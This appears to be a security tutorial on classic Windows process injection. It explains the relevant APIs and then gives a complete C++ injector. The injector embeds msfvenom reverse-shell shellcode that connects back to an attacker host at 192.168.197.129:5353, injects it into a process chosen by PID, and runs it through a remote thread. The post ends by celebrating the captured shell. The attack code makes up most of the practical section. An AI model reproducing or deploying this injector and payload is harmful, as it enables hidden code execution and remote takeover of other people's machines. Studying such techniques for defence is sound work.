Here We Will Learn About The Classic Process Injection.

we will use the following APIs to perform the Classic Process Injection technique.

How can we perform Process Injection !?

1) Getting A Handle To The Process

1. CreateToolHelp32Snapshot() will help us to get snapshot for the process we want.

The Arguments of the function.

1. DWORD dwFlag —> the parts of the process we want to include in the snapshot

2. DWORD th32ProcessID —> this is the PID of the Process we want to take a handle for

2. OpenProcess() —> we will use this to open a new process.

The Arguments of the Function

1. DWORD dwDesiredAccess —> this is where we identify the access we want from the process

Now, let’s see what access can we have.

This is some of the access we may have for now we will use the PROCESS_ALL_ACCESS

2. BOOL bInheritHandle —> set this Value To False

3. DWORD dwProcessId —> this is the PID of the process we want to get Handle for

2) Allocate The Memory For The Payload

1. VirtualAllocEx() —>this will help us to allocate a memory region in the targeted function.

The Arguments of the function.

1. HANDLE hprocess —> this the process handle we obtained earlier from section 1

2. LPVOID lpAddress —> this will determine the starting address for the payload.

3. SIZE_T dwSize —> this is the size of memory we need for our payload.

4. DWORD flAllocationType —> this is the type of the memory allocation.

we will use the (MEM_COMMIT | MEM_RESERVE) we will use those options together

5. DWORD flProtect —> this will identify the memory protections.

we will use PAGE_READWRITE and then we will change it to PAGE_EXECUTE in another way

3) Write payload into newly allocated memory

1. WriteProcessMemory() —> this will write the payload in the targeted process memory.

The Arguments of the Function.

1. HANDLE hprocess —> the handle to the process we obtained earlier.

2. LPVOID lpBaseAddress —> the base address from where the data will be written

3. LPVOID lpBuffer —> the buffer you want to write in the target process

4. SIZE_T nSize —> the size of the buffer

5. SIZE_T lpNumberOfBytesWritten —> ignore the parameter.

4) Create new remote thread

1. CreateThreadEx() —> create new thread that runs in target process.

The Arguments of the Function.

1. HANDLE hprocess —> the handle of the process we obtained.

2. lpThreadAttributes —> the security of the new thread.

3. SIZE_T dwStackSize —> the initial size of the stack

4. lpStartAddress —> the pointer to the buffer address to be executed

5. lpParameter —> the paramters passed to the thread function

6. dwCreationFlags —> this will control the process creation

7. lpThreadID —> will return the ThreadID

Now let’s what is happening

Imagine we have the injector.exe and containing the buffer we want to inject to the legitimate process.

notice that the buffer is transmitted to the legitimate process.

Now finally Practical time 🔥

we will use all what we learned to create a simple process injector.

#include <iostream>
#include <Windows.h>
#include <tlhelp32.h>
using namespace std;

HANDLE hProcess = NULL;
HANDLE hThread = NULL;
LPVOID rBuffer = NULL;
DWORD PID = NULL;
DWORD TID = NULL;
DWORD OldMemProtection = 0;
// msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.197.129 LPORT=5353 -f c -v evilbuf
unsigned char evilbuf[] =
"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50"
"\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52"
"\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a"
"\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41"
"\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52"
"\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\\x80\\x88\\x00\\x00\\x00\\x48"
"\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40"
"\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48"
"\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41"
"\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1"
"\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c"
"\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01"
"\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a"
"\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b"
"\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33"
"\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00"
"\\x00\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x14\\xe9\\xc0\\xa8\\xc5\\x81"
"\\x41\\x54\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07"
"\\xff\\xd5\\x4c\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29"
"\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48"
"\\xff\\xc0\\x48\\x89\\xc2\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea"
"\\x0f\\xdf\\xe0\\xff\\xd5\\x48\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89"
"\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81"
"\\xc4\\x40\\x02\\x00\\x00\\x49\\xb8\\x63\\x6d\\x64\\x00\\x00\\x00\\x00"
"\\x00\\x41\\x50\\x41\\x50\\x48\\x89\\xe2\\x57\\x57\\x57\\x4d\\x31\\xc0"
"\\x6a\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\\x24\\x54\\x01\\x01"
"\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\\x56\\x50\\x41"
"\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\\xc8\\x4d"
"\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x48"
"\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\\x87\\x1d\\x60\\xff"
"\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5"
"\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb"
"\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\\xd5";

int main()
{
    cout << "Welcome To Rem01x Classic Process Injector\\n";
    cout << " Please Enter The PID Of The Target Process: ";
    cin >> PID;
    // Open Handle To The Target Process
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (hProcess == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed To Obtain A Handle To Remote Process: %d\\nError: %d", hProcess, GetLastError());
        return EXIT_FAILURE;
    }
    else
    {
        printf("[+] Successfully Obtained A Handle For Remote Process: %d\\n", hProcess);
    }
    // Allocate Memory Inside The Remote Process
    rBuffer = VirtualAllocEx(hProcess, NULL, sizeof(evilbuf), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    if (rBuffer == NULL)
    {
        printf("[-] Failed To Allocate %d Bytes In Remote Process\\nError: %d", sizeof(evilbuf), GetLastError());
        return EXIT_FAILURE;
    }
    else
    {
        printf("[+] Successfully Allocated %d Bytes In Remote Process\\n", sizeof(evilbuf));
    }
    // Write The Payload In Remote Process Memory
    if (!WriteProcessMemory(hProcess, rBuffer, evilbuf, sizeof(evilbuf), NULL))
    {
        printf("[-] Faild To Write The Payload To Remote Process\\nError: %d", GetLastError());
        return EXIT_FAILURE;
    }
    else
    {
        printf("[+] Successfully Written The Payload In The Remote Process\\n");
    }
    // Change The Protection From RW -> RX In Remote Process
    if(!VirtualProtectEx(hProcess, rBuffer, sizeof(evilbuf), PAGE_EXECUTE_READ, &OldMemProtection))
    {
        printf("[-] Failed To Change The Permissions Form RW -> RX In The Remote Process\\nError: %d", GetLastError());
        return EXIT_FAILURE;
    }
    else
    {
        printf("[+] Successfully Changed The Permissions From RW -> In The Remote Porcess\\n");
    }
    
    // Create Remote Thread In The Remote Process
    hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &TID);
    if (hThread == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed To Create Remote Thread\\nError: %d", GetLastError());
    }
    else
    {
        printf("[+] Successfully Created Remote Thread\\n");
    }
    // Waiting For The Thread To Finish The Execution
    WaitForSingleObject(hThread, INFINITE);
    // Clearing Memoey
    printf("Clearing...");
    ~~CloseHandle(hThread);
    CloseHandle(hProcess);~~
    printf("See You On The Next Time Rem01x :)");
    return EXIT_SUCCESS;
}

Now, Let’s Run The Code.

Now, Let’s go to the attacker machine.

And We Are In 😈